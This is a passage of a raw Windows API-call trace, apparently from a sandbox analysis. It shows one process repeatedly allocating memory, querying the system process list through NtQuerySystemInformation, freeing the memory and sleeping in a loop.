FreeType=0x8000) returned 0x0 [0229.247] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.258] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.268] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.283] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.294] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.306] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.328] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.338] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.479] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.488] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.496] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.504] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.511] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.520] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.527] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.535] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.542] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.549] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.579] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.614] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 